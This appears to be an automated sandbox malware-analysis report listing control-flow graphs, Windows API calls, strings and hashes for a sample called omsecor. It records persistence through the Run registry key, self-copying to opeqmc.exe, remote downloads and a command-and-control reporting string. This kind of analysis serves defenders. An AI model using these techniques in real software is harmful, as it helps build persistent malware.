7006 40267a 122 API calls 7005->7006 7007 402d00 7006->7007 7008 409c6f SysFreeString 7007->7008 7009 402d08 7008->7009 7010 4032af ExitProcess 7015 402c32 7016 40267a 122 API calls 7015->7016 7017 402c56 7016->7017 7018 409c6f SysFreeString 7017->7018 7019 402c5e 7018->7019 6816 402df3 6817 406c77 3 API calls 6816->6817 6818 402e08 6817->6818 6819 406cb5 GetVersionExW 6818->6819 6820 402e0d 6819->6820 6821 40a8f9 34 API calls 6820->6821 6822 402e20 6821->6822 6823 40267a 122 API calls 6822->6823 6824 402e39 6823->6824 7020 4094b6 7021 4094c9 7020->7021 7022 4094cd 7021->7022 7023 4094f3 CharLowerW CharLowerW 7021->7023 7024 4094e3 SysFreeString 7021->7024 7026 409560 7023->7026 7028 409512 7023->7028 7025 40957e 7024->7025 7027 40956f SysFreeString SysFreeString 7026->7027 7027->7025 7028->7026 7028->7027 7029 40953a CharLowerW 7028->7029 7030 409544 7029->7030 7031 40956a SysFreeString 7030->7031 7031->7027 7032 402db7 7033 40267a 122 API calls 7032->7033 7034 402dd1 7033->7034 7035 40183a 7036 401854 7035->7036 7037 408091 3 API calls 7036->7037 7040 401958 7036->7040 7038 40194a 7037->7038 7039 408091 3 API calls 7038->7039 7039->7040 7043 402e3e 7053 402e4d 7043->7053 7044 40327c 7045 402eb7 GetModuleFileNameW 7046 402ed6 GetCurrentDirectoryW 7045->7046 7045->7053 7046->7053 7047 402f2a GetLastError 7048 40a786 35 API calls 7047->7048 7048->7053 7049 403251 GetLastError 7049->7053 7050 403237 GetLastError 7050->7053 7051 40a786 35 API calls 7051->7053 7052 407552 Sleep 7052->7053 7053->7044 7053->7045 7053->7047 7053->7049 7053->7050 7053->7051 7053->7052 7054 40253c 50 API calls 7053->7054 7054->7053 7066 403bbf 7067 40821c PathCombineW 7066->7067 7068 403bdf 7067->7068 7069 403bf9 7068->7069 7070 403bfe 7068->7070 7071 403bee 7068->7071 7073 4039ea 12 API calls 7070->7073 7072 4039a3 8 API calls 7071->7072 7072->7069 7073->7069

Control-flow Graph

Blocks and edges: 305 40abd9-40abf5 call 40ac20; 308 40abf7-40ac0c FindFirstFileW 305->308; 309 40ac1a 305->309 308->309; 310 40ac0e-40ac18 FindClose 308->310; 311 40ac1c-40ac1f 309->311 310->311

APIs
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
• FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
• FindClose.KERNEL32(00000000), ref: 0040AC0F

Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd

Similarity
• API ID: FindOpen$CloseFileFirst
• String ID:
• API String ID: 3155378417-0
• Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
• Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
• Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
• Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
• GetLastError.KERNEL32(00000004), ref: 0040B3CA
• Sleep.KERNEL32(00002710), ref: 0040B3F7
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
• CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
• ExitProcess.KERNEL32 ref: 0040B44D
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
• GetLastError.KERNEL32(00000004), ref: 0040B48D
• GetLastError.KERNEL32(00000004), ref: 0040B49A
• ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
• GetLastError.KERNEL32(00000004), ref: 0040B500

Strings

Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd

Similarity
• API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
• String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
• API String ID: 3692109554-477663111
• Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
• Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
• Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
• Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

Control-flow Graph

APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
• GetFileSize.KERNEL32(?,00000000), ref: 0040762E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
• HeapAlloc.KERNEL32(00000000), ref: 0040763F
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
• ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
• ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
• WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
• CloseHandle.KERNEL32(?), ref: 00407714
• CloseHandle.KERNEL32(?), ref: 00407719

Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd

Similarity
• API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
• String ID:
• API String ID: 1458499590-0
• Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
• Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

Control-flow Graph

APIs
• InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
• GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
• HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
• InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
• GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
• HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
• GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
• HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Heap$Process$AllocInternet$FileFreeOpenRead
• String ID: hOA
• API String ID: 1355009786-3485425990
• Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
• Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
• Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
• Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: CountTick
• String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
• API String ID: 536389180-1762329985
• Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
• Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
• Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
• Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 179 40a79e-40a7a3 Sleep 176->179 179->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
APIs
• Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
• Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
• Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
• GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
• HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
• String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
• API String ID: 3100629401-2436734164
• Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
• Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
• Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
• Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
• GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
• CloseHandle.KERNEL32(00000000), ref: 00407880
• GetTickCount.KERNEL32 ref: 00407888
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: File$CloseCountCreateHandleModuleNameTickTime
• String ID: UniqueNum
• API String ID: 1853814767-3816303966
• Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
• Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
• Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
• Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 235 407e44-407e4c 230->235 233 407eba 231->233 234 407e7e-407e82 231->234 237 407ebc-407ebe 233->237 234->233 236 407e84 234->236 235->231 235->233 238 407e86-407e8f 236->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->237
APIs
• SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
• ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateModuleNamePointerRead
                                                                                                                                                                                                                • String ID: UniqueNum$d$hOAd$x
                                                                                                                                                                                                                • API String ID: 1528952607-1018652783
                                                                                                                                                                                                                • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                                • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

Control-flow Graph

[control-flow graph image not reproduced: basic blocks 40ac20-40ac92; calls 4069c0; APIs RegOpenKeyExW (two call sites)]
APIs
• RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
• RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
  • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Open$CloseQueryValue
• String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• API String ID: 3546245721-4228964922
• Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
• Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
• Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
• Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

Control-flow Graph

APIs
• GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
• GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
• CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
• CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: CharLower$CommandFileLineModuleName
• String ID: /nomove
• API String ID: 1338073227-1111986840
• Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
• Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
• Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
• Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Control-flow Graph

[control-flow graph image not reproduced: basic blocks 407cd7-407d60; calls 40d5b0, 406cf9, 4054ed; APIs GetModuleFileNameW, GetCurrentDirectoryW, CreateFileW]
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
• GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: File$CreateCurrentDirectoryModuleName
• String ID: \merocz.xc6
• API String ID: 3818821825-505599559
• Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
• Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
• Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
• Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

Control-flow Graph

[control-flow graph image not reproduced: basic blocks 407727-4077ee; calls 40d5b0, 4075d4, 40a786; APIs GetModuleFileNameW, ExpandEnvironmentStringsW, GetLastError]
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,76230900,00000400,00000000,0040B4B3,00000000), ref: 00407744
• ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
• GetLastError.KERNEL32(00000004), ref: 004077A9
  • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
  • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
• String ID:
• API String ID: 1536607067-0
• Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
• Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
• Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
• Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _memset.LIBCMT ref: 00407800
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateProcess_memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1177741608-0
                                                                                                                                                                                                                • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                                • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                                • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
